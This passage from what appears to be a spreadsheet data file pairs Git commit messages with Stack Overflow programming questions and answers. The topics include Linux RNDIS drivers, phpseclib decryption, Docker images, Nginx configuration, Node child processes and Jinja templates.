    rotate=\WCmidangle+(\WCmidangle&amp;lt;90?0:(\WCmidangle&amp;lt;270?180:0))
  }
}
\wheelchart[
  arc data=\WCvarA,
  radius={6}{7.5},
  slices style{25,26}={purple,draw=lightgray},
  slices style{27,28}={pink,draw=lightgray},
  slices style{29,30}={magenta,draw=lightgray},
  slices style{57}={darkgray}
]{%
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,%
}
\end{tikzpicture}
\end{document}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I interpret the error to mean that the package wheelchart expects a WCvarB. Although WCvarB was used in one of the wheelcharts in the code Iâ€™m using, it was not in the piece I am modifying. The wheelchart manual refers to WC vars A, B, and C automatically initialized/instantiated (?) and assigned meanings, but I donâ€™t see how WCvarB is expected in this wheelchart.&lt;/p&gt;
&lt;p&gt;I tried putting some text in between the commas defining my slices (to see how it reacted to my including something that would be read as the expected WCvarB) but then I couldnâ€™t compile under scroll mode (over 100 errors, it said).&lt;/p&gt;
&lt;p&gt;I checked for transcription errorsâ€“and added and removed commas where I thought there might be a problemâ€“but couldnâ€™t find any, however I have modified the sample code enough that I wouldnâ€™t know where a comma might be missing or something.&lt;/p&gt;
&lt;p&gt;I wasnâ€™t sure exactly what was needed with the pgfkeys call, and when I tried playing with it, either I couldnâ€™t detect a change or I didnâ€™t have compilable code. Iâ€™m sure there is unneeded stuff in it since I stripped out the text and labels on this wheelchart call and could remove the other calls in making the minimal.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C850</t>
  </si>
  <si>
    <t>rndis_host: support Hytera digital radios
commit 29262e1f773b4b6a43711120be564c57fca07cfb upstream.
Hytera makes a range of digital (DMR) radios. These radios can be
programmed to a allow a computer to control them over Ethernet over USB,
either using NCM or RNDIS.
This commit adds support for RNDIS for Hytera radios. I tested with a
Hytera PD785 and a Hytera MD785G. When these radios are programmed to
set up a Radio to PC Network using RNDIS, an USB interface will be added
with class 2 (Communications), subclass 2 (Abstract Modem Control) and
an interface protocol of 255 ("vendor specific" - lsusb even hints "MSFT
RNDIS?").
This patch is similar to the solution of this StackOverflow user, but
that only works for the Hytera MD785:
https://stackoverflow.com/a/53550858
To use the "Radio to PC Network" functionality of Hytera DMR radios, the
radios need to be programmed correctly in CPS (Hytera's Customer
Programming Software). "Forward to PC" should be checked in "Network"
(under "General Setting" in "Conventional") and the "USB Network
Communication Protocol" should be set to RNDIS.
Signed-off-by: Thomas Toye &lt;thomas@toye.io&gt;
Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt;
(cherry picked from commit 0f0979643bc2b7a8f3f392ab9ec94b485ec5c6c1)</t>
  </si>
  <si>
    <t>I add the idVendor and idProduct to the white list of structure array prodocts[] in file rndis_host.c.
static const struct usb_device_id   products [] = {
{   /* DMR Radio*/
    USB_DEVICE_AND_INTERFACE_INFO(0x238b, 0x0a21,
                  USB_CLASS_COMM, 2 /* ACM */, 0x0ff),
    .driver_info = (unsigned long) &amp;rndis_info,
}, {
And, It works.</t>
  </si>
  <si>
    <t xml:space="preserve">I've been designing an application, based on .NET/Mono framework, which should make an heavy use of the shortest-path in a graph theories and I would like to use a native solution to traverse the nodes of the graph, instead of implementing surrogate solutions which would be hardly maintainable and would massively affect performances.
I've found an application which would be perfect for my scope: neo4j.
Unfortunately, this application is purely written in Java code and it's not portable to .NET, because of the massive differences between the two architectures.
Is anyone out there knows if is it there any port of neo4j or a similar solution for .NET?
</t>
  </si>
  <si>
    <t>C851</t>
  </si>
  <si>
    <t>Upgraded BDayReminder.Domain to .NetStandard
Fixed the upgradation errors by following the below links,
        https://www.hanselman.com/blog/ReferencingNETStandardAssembliesFromBothNETCoreAndNETFramework.aspx
        https://stackoverflow.com/questions/42138418/equivalent-to-assemblyinfo-in-dotnet-core-csproj
       https://docs.microsoft.com/en-us/azure/service-fabric/service-fabric-reliable-services-communication-remoting#upgrade-from-remoting-v1-to-remoting-v2-interface-compatible</t>
  </si>
  <si>
    <t>As you've already noticed, you can control most of these settings in .csproj.
If you'd rather keep these in AssemblyInfo.cs, you can turn off auto-generated assembly attributes.
&lt;PropertyGroup&gt;
   &lt;GenerateAssemblyInfo&gt;false&lt;/GenerateAssemblyInfo&gt;
&lt;/PropertyGroup&gt;
If you want to see what's going on under the hood, checkout
Microsoft.NET.GenerateAssemblyInfo.targets
inside of Microsoft.NET.Sdk.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have a legacy app that moved to Debian 11 stuck with PHP 8.2 (PHP 5.6 no longer available for use).   Original application utilized the first version of phpseclib but after being moved to new php 8.2 machine, no longer works, nothing in the log, it just returns unrecognizable data upon encryption calls.&lt;/p&gt;
&lt;p&gt;This works on the old server it was moved from (works on PHP5, but not PHP8):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$rijndael = new Crypt_Rijndael(CRYPT_RIJNDAEL_MODE_ECB);
$rijndael-&amp;gt;setKey('akeyof32btyeslongabcdefghijklmop');
$keylen = 256;
$rijndael-&amp;gt;setKeyLength($keylen);
$rijndael-&amp;gt;setBlockLength($keylen);
$decrypted1 = $rijndael-&amp;gt;decrypt($EncryptedDataOf256bytes);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Tried upgrading to phpseclib3 with PHP 8.2 - data also returned unrecognizable.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$rijndael1 = new \phpseclib3\Crypt\Rijndael('ecb');
$keylen = 256;
$rijndael-&amp;gt;setKey('akeyof32btyeslongabcdefghijklmop');
$rijndael1-&amp;gt;setKeyLength($keylen);
$rijndael1-&amp;gt;setBlockLength($keylen);
$rijndael1-&amp;gt;disablePadding();         // tried with and without padding, 
$decrypted1 = $rijndael1-&amp;gt;decrypt($bindata)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking into phpseclib3 it looks to have support for rijndael ECB 256 bit keys but the earlier version phpseclib didn't, so not even sure at this point how it worked.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Update:&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;As suggested below, should have provided an isolated test of this because once that was done, it was obvious it had nothing to do with phpseclib. It was PHP 8 that didn't like assigning ascii characters greater than 128 to the key string.&lt;/p&gt;
&lt;p&gt;Here was the test:&lt;/p&gt;
&lt;hr /&gt;
&lt;pre&gt;&lt;code&gt;function hex2str($hex) 
{      
    $str='';
    for($i=0;$i&amp;lt;strlen($hex);$i+=2)        
        $str .= chr(hexdec(substr($hex,$i,2)));       
    return $str;    
}
$TestData = &amp;quot;832A1C083EA2A807C157644EC134F370F454DED46E8BEDB37EB62C21CB46694D77817D7A64705E0F72D9EAC6699C1E0CE51A32EB8364F80A7597D90F487B522169A525983FC651FA5FB631846E3B9EBE68D79E9C6F85254BCC7E1042B951836EF98D3D2D28378333D055FF8D1929A8EB4BEB1C9DEA4ECDDED7D328C9EFA3D006F98D3D2D28378333D055FF8D1929A8EB4BEB1C9DEA4ECDDED7D328C9EFA3D006F98D3D2D28378333D055FF8D1929A8EB4BEB1C9DEA4ECDDED7D328C9EFA&amp;quot;;
$BinData = hex2str($TestData);
$rijndael = new Crypt_Rijndael(CRYPT_RIJNDAEL_MODE_ECB);
$rijndael-&amp;gt;setKey('akeyof32btyeslongabcdefghijklmop');
$keylen = 256;
$rijndael-&amp;gt;setKeyLength($keylen);
$rijndael-&amp;gt;setBlockLength($keylen);
$decrypted1 = $rijndael-&amp;gt;decrypt($BinData);
echo &amp;quot;Decrypted data\n&amp;quot;;
echo $decrypted1;
// $decrypted result 
// &amp;quot;ThisIsATestStringOfTheDataBeingUsedWhenItIsUnencrypted123456789012345678901233456&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This worked by itself but tested with a key that had characters outside of 0-128, it failed because in php5 you could assign them directly as a text string.   Under php8 this does not work and the key string had to be constructed byte by byte.   There is probably a simple trick to do this but PHP is not my area of expertise.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C852</t>
  </si>
  <si>
    <t>feat: use dotnet 8 azurelinux3.0 distroless docker images (#572)
# Motivation
Reduce the size of the images and reduce surface of attack.
# Description
Use `mcr.microsoft.com/dotnet/aspnet:8.0-azurelinux3.0-distroless` as
base image instead of `mcr.microsoft.com/dotnet/aspnet:8.0`. It mainly
changes the way the images are constructed:
- Images are minimalist so it is not possible to create new users. We
use `$APP_UID` user defined by the image with ID 1654 as of now instead
of `armonikuser` with ID 5000.
- The `/cache` folder is not created anymore. Driver options are given
to create the volume underneath and make it properly available for the
agent and the worker.
The size of the images is reduced by around 100Mo.
# Testing
- Pipelines in this repo are passing.
- Tests in ArmoniK infrastructure on localhost and in AWS
# Impact
- Reduced surface of attack and less CVEs
- Smaller images
- For compatibility with other workers (extensions, samples), the
infrastructure will have to set a common user between the agent and the
worker to share the sockets used for communication between the two.
# Additional Information
-
https://stackoverflow.com/questions/51456621/docker-volumes-specifying-permissions-using-mount-options
- https://www.howtogeek.com/812961/umask-linux/</t>
  </si>
  <si>
    <t>Not entirely sure what your issue is, but this worked for me:
docker run --name test_named_volume \
  --mount type=volume,source=test_vol,target=/home/user \
  --user user \
  test_named_volume touch /home/user/a
I think where you could have gone wrong is:
Your mount target is
/home/user/test
has not been created yet, since the
useradd
command in your Dockerfile only creates
$HOME
(
/home/user
). So docker creates the directory within the container with root permissions.
You were not using the
--user
flag in docker run to run the container as the specified user.</t>
  </si>
  <si>
    <t xml:space="preserve">I am hoping that an architecture question is reasonable on Stackoverflow, so I am asking this here.
I have been trying to see where a functional language would be useful outside of math-oriented problems, and it dawned on me that an ESB (Enterprise Service Bus) would be perfect for a FP language, as there isn't anything shared between requests, in my experience, as the initial message comes in and gets processed as it goes through, based on transform rules.
Would there be any reason why this would be a bad idea?
Is it in the progress of being done already?
The scalability of something like Erlang may be very useful I believe.
</t>
  </si>
  <si>
    <t>C853</t>
  </si>
  <si>
    <t>rndis_host: support Hytera digital radios
commit 29262e1f773b4b6a43711120be564c57fca07cfb upstream.
Hytera makes a range of digital (DMR) radios. These radios can be
programmed to a allow a computer to control them over Ethernet over USB,
either using NCM or RNDIS.
This commit adds support for RNDIS for Hytera radios. I tested with a
Hytera PD785 and a Hytera MD785G. When these radios are programmed to
set up a Radio to PC Network using RNDIS, an USB interface will be added
with class 2 (Communications), subclass 2 (Abstract Modem Control) and
an interface protocol of 255 ("vendor specific" - lsusb even hints "MSFT
RNDIS?").
This patch is similar to the solution of this StackOverflow user, but
that only works for the Hytera MD785:
https://stackoverflow.com/a/53550858
To use the "Radio to PC Network" functionality of Hytera DMR radios, the
radios need to be programmed correctly in CPS (Hytera's Customer
Programming Software). "Forward to PC" should be checked in "Network"
(under "General Setting" in "Conventional") and the "USB Network
Communication Protocol" should be set to RNDIS.
Signed-off-by: Thomas Toye &lt;thomas@toye.io&gt;
Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have set up Nginx on my server to serve static files for a front-end application. The root URL (&lt;code&gt;http://xxx.85.127.14/&lt;/code&gt;) correctly serves files, but when I try to access &lt;code&gt;http://xxx.85.127.14/admin&lt;/code&gt; I get an &lt;strong&gt;ERR_EMPTY_RESPONSE&lt;/strong&gt; error in the browser.&lt;/p&gt;
&lt;p&gt;However, when I test locally it works:&lt;br /&gt;
curl -I http://localhost/admin&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Server &amp;amp; Environment Details:&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;OS:&lt;/strong&gt; Ubuntu 20.04&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Web Server:&lt;/strong&gt; Nginx&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Frontend Framework:&lt;/strong&gt; React/Vue (if applicable)&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Deployment Directory:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;/root/deployment/user/dist&lt;/code&gt; (for &lt;code&gt;/&lt;/code&gt;) user&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;/root/deployment/admin/dist&lt;/code&gt; (for &lt;code&gt;/admin&lt;/code&gt;)&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;Nginx Configuration (/etc/nginx/sites-available/default)
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    server_name xxx.85.127.14;
    location / {
        root /root/deployment/user/dist;
        index index.html;
        try_files $uri /index.html;
    }
    location /admin {
        root /root/deployment/admin/dist;
        index index.html;
        try_files $uri /index.html;
    }
    location /api/ {
        proxy_pass http://localhost:5000/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C854</t>
  </si>
  <si>
    <t xml:space="preserve">I've read about it, I understand it's basic function--I'd like to know an example of a common, real-life use for this pattern.
For reference, I work mostly with business applications, web and windows, using the Microsoft stack.
</t>
  </si>
  <si>
    <t>C855</t>
  </si>
  <si>
    <t>Update postMessage support for ie11
postMessage is not supported for cross domain window communication as per:
http://stackoverflow.com/questions/21070553/postmessage-still-broken-on-ie11</t>
  </si>
  <si>
    <t>Is it broken? Well, sort of.
I tried various ideas and couldn't get the code in your jsFiddle to work. Looking at this MSDN Blog post, we find that postMessage only works between IFrames in older versions of IE, which has yet to be fixed for IE 11.
That article links to a demo of the problem. There are a couple of workarounds that involve calling scripts on the window.opener. However, as that blog states (emphasis mine):
Unfortunately, this workaround often isn't possible, because same-origin-policy dictates that the popup window and the window.opener page must be from the same origin in order to call each other's script functions.
So it looks like the only way to do this is something like this, where the child is hosted in an IFrame in the parent. I have created a similar demo here, based on the code in yours. It's pretty simple, but posts a message to the contentWindow of the IFrame, which in turn responds.
I see the recommendation to use MessageChannel instead, but I also wonder if using Web Workers might be worth investigating, though their use would of course depend on the nature of your task. There is also the answer to this question, where the IFrame approach was used, but a jQuery UI dialog was used to display it - I would imagine you could do the same thing with modals in Bootstrap if you prefer that.
For reference:
HTML
&lt;iframe id="iframe" src="http://jsbin.com/iLapokOS/7/"&gt;&lt;/iframe&gt;
&lt;div id="log"&gt;&lt;/div&gt;
&lt;button id="post-message-button"&gt;Post message to window&lt;/button&gt;
Parent script
var wnd;
$(document).ready(function() {
    $('#log').append('listening...');
    wnd = $('#iframe')[0].contentWindow;
    window.addEventListener('message', function(e){
      $('#log').append('&lt;br/&gt;Received message: ' + JSON.stringify(e.data));
    }, false);
    $('#post-message-button').click(function() {
        if(!wnd){
            return;
        }
        $('#log').append('&lt;br/&gt;sending...');
        wnd.postMessage('Hello?', 'http://jsbin.com');
    });
});
Child HTML and JS
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;script src="http://code.jquery.com/jquery-latest.js"&gt;&lt;/script&gt;
&lt;meta charset=utf-8 /&gt;
&lt;title&gt;JS Bin&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;script&gt;
    $(document).ready(function() {
      window.addEventListener("message", function(e){
        $('body').append('&lt;br/&gt;Origin: ' + e.origin);        
        $('body').append("&lt;br/&gt;Received message: " + JSON.stringify(e.data));
        e.source.postMessage('Hello yourself', e.origin);
      }, false);
    });
  &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone has experience handling proxy support and disabling of SSL for exchangelib?  there is a reference for handling of proxy support &lt;a href="https://ecederstrand.github.io/exchangelib/#proxies-and-custom-tls-validation" rel="nofollow noreferrer"&gt;https://ecederstrand.github.io/exchangelib/#proxies-and-custom-tls-validation&lt;/a&gt; but it does not handle disabling of SSL.  Tried this code from co-pilot but runs into error :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class CustomProtocol(BaseProtocol):
    def __init__(self, *args,**kwargs):
        self.proxy = kwargs.pop('proxy',None)
        super().__init__(*args, **kwargs)
    def get_adapter(self):
        return NoVerifyHTTPAdapter()
    def init_poolmanager(self, *args, **kwargs):
        kwargs[&amp;quot;ssl_context&amp;quot;] = self.get_adapter().ssl_context
        kwargs[&amp;quot;proxy&amp;quot;] = self.proxy
        super().init_poolmanager(*args, **kwargs)
    def send(self, *args, **kwargs):
    PROXY_URL=environment_variables[&amp;quot;PROXY_URL&amp;quot;]
        kwargs[&amp;quot;proxies&amp;quot;] = {
        &amp;quot;http&amp;quot;: PROXY_URL,
        &amp;quot;https&amp;quot;: PROXY_URL,
        }
        return super().send(*args, **kwargs)
BaseProtocol.HTTP_ADAPTER_CLS = CustomProtocol #change to use custom adapter for proxy
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I got the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;trying to establish connection to exchange server using exchangelib over http proxy and ssl disabled
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C856</t>
  </si>
  <si>
    <t xml:space="preserve">What are some good questions to ask in an interview to see how much the applicant knows about architecture?
</t>
  </si>
  <si>
    <t>C857</t>
  </si>
  <si>
    <t>Template system overhaul: use macros as interface
Jinja templating engine has a unique macro feature. Despite its name,
macros behaves much like functions do in common programming languages.
Macros are named like so because one of the authors of Jinja felt like
`enddef` sounded stupid and `endfunction` is too long of a keyword.[1]
From now on, we are going to employ this macro interface extensively to
make the codebase easy to understand and modify.
As such, we are going to pass variables through macro interface
explicitly. That is, we refrain from using `include`s and `extend`s.
These language constructs implicitly pass variables through a context.
Included templates need to know about what variables are present by
looking into the original template. By using these features more and
more, a two-way communication pops up here and there. In contrast, macros
(functions) only need to care about themselves once a programmer decides
the interfaces.
By rendering a macro rather than the whole template[2], we can use
templates like functions without caring too much about hidden
dependencies between templates. To facilitate the ergonomics of macros
further, I wrote `@macro_template(name, macro_name)` decorator. It
accepts a template `name` and an optional `macro_name` which is assumed
to be the stem of `name` if not specified. The decorated function is a
type signature of the corresponding macro. It is a bit cumbersome to
write the similar code twice in order to start using Jinja templates,
but I hope the codebase becomes more maintainable by spelling out
underlying assumptions in types.
[1]: https://lucumr.pocoo.org/2010/12/5/not-so-stupid-template-languages/
[2]: https://stackoverflow.com/a/43961589</t>
  </si>
  <si>
    <t>You are absolutely right, it has been caused on the Jinja side. Method
get_template_attribute()
from the Flask looks like this:
return getattr(current_app.jinja_env.get_template(template_name).module,
               attribute)
So it tries to retrieve a template name, and afterward, call to the property
module
evaluates this template before the list of the properties will be generated. In your case, the reference to the variable
request
remained unknown for the Jinja. For more details check
Jinja's
environment.py
sources
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to scrape data from &lt;a href="http://www.example.com" rel="nofollow noreferrer"&gt;www.example.com&lt;/a&gt; but the below code returns error :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import asyncio
from crawl4ai import AsyncWebCrawler
from crawl4ai.async_configs import BrowserConfig, CrawlerRunConfig
async def main() :
    try :
    # Create an instance of AsyncWebCrawler
        # async with AsyncWebCrawler as crawler :
        crawler = AsyncWebCrawler()
            # Run the crawler on a URL
        result = await crawler.arun(url=&amp;quot;https://crawl4ai.com&amp;quot;, config=CrawlerRunConfig())
            # Print the extracted content
        if result.markdown():
                print(result.markdown())
        else:
                print(&amp;quot;No Markdown content found.&amp;quot;)
    except Exception as e:
        print(f&amp;quot;An error occurred: {e}&amp;quot;)
# Run the async main function
if __name__ == &amp;quot;__main__&amp;quot; :
        try :
            asyncio.get_running_loop()
            loop = asyncio.ProactorEventLoop()
            asyncio.set_event_loop(loop)
            asyncio.run(main())
            print(&amp;quot;in try&amp;quot;)
        except RuntimeError :
            print(&amp;quot;in except&amp;quot;)
            asyncio.run(main())
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Error as below :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Ã— Unexpected error in _crawl_web at line 664 in create_browser_context (..\mahakumbh_venv\lib\site-                   â”‚
â”‚ packages\crawl4ai\async_crawler_strategy.py):                                                                         â”‚
â”‚   Error: 'NoneType' object has no attribute 'new_context'                                                             â”‚
â”‚                                                                                                                       â”‚
â”‚   Code context:                                                                                                       â”‚
â”‚   659               }                                                                                                 â”‚
â”‚   660               # Update context settings with text mode settings                                                 â”‚
â”‚   661               context_settings.update(text_mode_settings)                                                       â”‚
â”‚   662                                                                                                                 â”‚
â”‚   663           # Create and return the context with all settings                                                     â”‚
â”‚   664 â†’         context = await self.browser.new_context(**context_settings)                                          â”‚
â”‚   665                                                                                                                 â”‚
â”‚   666           # Apply text mode settings if enabled                                                                 â”‚
â”‚   667           if self.config.text_mode:                                                                             â”‚
â”‚   668               # Create and apply route patterns for each extension                                              â”‚
â”‚   669               for ext in blocked_extensions:                                                                    â”‚
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜
Crawl failed: Unexpected error in _crawl_web at line 664 in create_browser_context (..\mahakumbh_venv\lib\site-packages\crawl4ai\async_crawler_strategy.py):
Error: 'NoneType' object has no attribute 'new_context'
Code context:
 659               }
...
 667           if self.config.text_mode:
 668               # Create and apply route patterns for each extension
 669               for ext in blocked_extensions:
in try
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am expecting to print the scraped data from the url.
I have tried &lt;code&gt;asyncio.arun(main())&lt;/code&gt; instead of &lt;code&gt;asyncio.run(main())&lt;/code&gt; but it returns with Error: 'NoneType' object has no attribute 'new_context&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C858</t>
  </si>
  <si>
    <t>Improve Performance by Utilizing Shells Properly (#2151)
* Improve Performance by Utilizing Shells Properly
There are many ways to execute commands in nodejs via `child_process`.
Unfortunately, we were using `spawnSync` which blocks the entire thread (all of vscode extensions share one thread) which is highly inefficient.
I learned MANY things by reading various docs and such about all of the ways to do this to figure out the 'best' thing to do for our situation.
Here are some other fun improvments:
- You can spawn with powershell.exe shell! Running it with cmd (default shell) spawns a shell which spawns a shell, which is a huge unnecessary perf hit.
- You can go shell-less when running direct file executables to improve performance.
What more we could do (this is already a huge boost):
- The WSL check calls sync methods still because it needs to be called in the activate function to disable commands from showing up in WSL that are not supported. This makes startup slow. I would rather just have worse UX for WSL by allowing the command to appear but saying it doesn't work so it doesn't make vscode way slower for everybody.
Try to find places where executables can be used to reduce shell spawns.
# Ways to Run Commands
exec - spawns a shell. returns callback with error, stderr, stdout after waiting for it to complete. Any exit code other than 0 will be an error. error.signal for when a signal terminated it.
util.promisify(function) turns a callback into await or thenable (same thing) object with stderr or stdout and rejects with error with same object but with an error instead with exec.
execFile - same as exec but shellless - must be a file to exec instead of any generic command. No shell spawn by default thus more efficient as you should give it the path to the executable instead of expecting it to be found by the shell. Utilize when possible
spawn - shelless by default (which is faster if you dont need a shell but both have this option) spawns a new process with open stream communication for the command (shell or no shell) and streams data live. meant for 'interactive' commands and is better for huge data streams as you can chunk it.
fork - spawn a new process that can communicate with the parent, no shell support
spawnSync - Blocks the Entire Node Thread until its done. Same with execSync.
shelljs - a library for running native unix commands cross-plat
The ways to access the 'signal' or 'status code' are different and while spawn provides an easier interface to get to them in theory, if you read the docs on the callback return object possibilities from node you will see its applicable in either situation.
certain commands are implemented in nodejs such as chmod
# more reading
https://nodejs.org/api/child_process.html#child_processexeccommand-options-callback
https://stackoverflow.com/questions/14332721/node-js-spawn-child-process-and-get-terminal-output-live
https://stackoverflow.com/questions/48698234/node-js-spawn-vs-execute</t>
  </si>
  <si>
    <t>It's much easier now (6 years later)!
Spawn returns a childObject, which you can then listen for events with. The events are:
Class: ChildProcess
Event: 'error'
Event: 'exit'
Event: 'close'
Event: 'disconnect'
Event: 'message'
There are also a bunch of objects from childObject, they are:
Class: ChildProcess
child.stdin
child.stdout
child.stderr
child.stdio
child.pid
child.connected
child.kill([signal])
child.send(message[, sendHandle][, callback])
child.disconnect()
See more information here about childObject: https://nodejs.org/api/child_process.html
Asynchronous
If you want to run your process in the background while node is still able to continue to execute, use the asynchronous method. You can still choose to perform actions after your process completes, and when the process has any output (for example if you want to send a script's output to the client).
child_process.spawn(...); (Node v0.1.90)
var spawn = require('child_process').spawn;
var child = spawn('node ./commands/server.js');
// You can also use a variable to save the output 
// for when the script closes later
var scriptOutput = "";
child.stdout.setEncoding('utf8');
child.stdout.on('data', function(data) {
    //Here is where the output goes
    console.log('stdout: ' + data);
    data=data.toString();
    scriptOutput+=data;
});
child.stderr.setEncoding('utf8');
child.stderr.on('data', function(data) {
    //Here is where the error output goes
    console.log('stderr: ' + data);
    data=data.toString();
    scriptOutput+=data;
});
child.on('close', function(code) {
    //Here you can get the exit code of the script
    console.log('closing code: ' + code);
    console.log('Full output of script: ',scriptOutput);
});
Here's how you would use a callback + asynchronous method:
var child_process = require('child_process');
console.log("Node Version: ", process.version);
run_script("ls", ["-l", "/home"], function(output, exit_code) {
	console.log("Process Finished.");
	console.log('closing code: ' + exit_code);
	console.log('Full output of script: ',output);
});
console.log ("Continuing to do node things while the process runs at the same time...");
// This function will output the lines from the script 
// AS is runs, AND will return the full combined output
// as well as exit code when it's done (using the callback).
function run_script(command, args, callback) {
	console.log("Starting Process.");
	var child = child_process.spawn(command, args);
	var scriptOutput = "";
	child.stdout.setEncoding('utf8');
	child.stdout.on('data', function(data) {
		console.log('stdout: ' + data);
		data=data.toString();
		scriptOutput+=data;
	});
	child.stderr.setEncoding('utf8');
	child.stderr.on('data', function(data) {
		console.log('stderr: ' + data);
		data=data.toString();
		scriptOutput+=data;
	});
	child.on('close', function(code) {
		callback(scriptOutput,code);
	});
}
Using the method above, you can send every line of output from the script to the client (for example using Socket.io to send each line when you receive events on stdout or stderr).
Synchronous
If you want node to stop what it's doing and wait until the script completes, you can use the synchronous version:
child_process.spawnSync(...); (Node v0.11.12+)
Issues with this method:
If the script takes a while to complete, your server will hang for that amount of time!
The stdout will only be returned once the script has finished running. Because it's synchronous, it cannot continue until the current line has finished. Therefore it's unable to capture the 'stdout' event until the spawn line has finished.
How to use it:
var child_process = require('child_process');
var child = child_process.spawnSync("ls", ["-l", "/home"], { encoding : 'utf8' });
console.log("Process finished.");
if(child.error) {
    console.log("ERROR: ",child.error);
}
console.log("stdout: ",child.stdout);
console.log("stderr: ",child.stderr);
console.log("exist code: ",child.status);</t>
  </si>
  <si>
    <t xml:space="preserve">I have recently programmed a console application and I've experienced a lot of pain in designing it in many aspects, particularly in C#, given its pure OO paradigm. Questions I have faced include anything from how to pass the options to how to return problems to the entry point class, among many, many others.
My question is: would any of you know of good designs of console applications in an OO paradigm so I can learn from them? Code of good implementations is particularly welcome.
EDIT: I'm not after command-line APIs, but after good design principles, and, in particular, good implementations I could learn from.
EDIT 2: There is simple user interaction in the application, but it is not a full-fledged CLI/REPL sort. Think of it as the TeX command, more or less. Interestingly, even though there is good theory floating around (no different than X, use pattern Y, you should know OO principles...[your computer science professor would be so proud!]), there is no real code I can take a look at to see these concepts in action. Again, where should I look (code!) for a good command line application in a pure OO paradigm?
</t>
  </si>
  <si>
    <t>C859</t>
  </si>
  <si>
    <t>rndis_host: support Hytera digital radios
commit 29262e1f773b4b6a43711120be564c57fca07cfb upstream.
Hytera makes a range of digital (DMR) radios. These radios can be
programmed to a allow a computer to control them over Ethernet over USB,
either using NCM or RNDIS.
This commit adds support for RNDIS for Hytera radios. I tested with a
Hytera PD785 and a Hytera MD785G. When these radios are programmed to
set up a Radio to PC Network using RNDIS, an USB interface will be added
with class 2 (Communications), subclass 2 (Abstract Modem Control) and
an interface protocol of 255 ("vendor specific" - lsusb even hints "MSFT
RNDIS?").
This patch is similar to the solution of this StackOverflow user, but
that only works for the Hytera MD785:
https://stackoverflow.com/a/53550858
To use the "Radio to PC Network" functionality of Hytera DMR radios, the
radios need to be programmed correctly in CPS (Hytera's Customer
Programming Software). "Forward to PC" should be checked in "Network"
(under "General Setting" in "Conventional") and the "USB Network
Communication Protocol" should be set to RNDIS.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created simple python script:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;import logging
import sys
if __name__ == &amp;quot;__main__&amp;quot;:
    logging.basicConfig(level=logging.DEBUG)
    print(&amp;quot;This is a normal print statement&amp;quot;, file=sys.stdout)
    logging.debug(&amp;quot;debug message&amp;quot;)
    logging.info(&amp;quot;info message&amp;quot;)
    logging.warning(&amp;quot;warning message&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
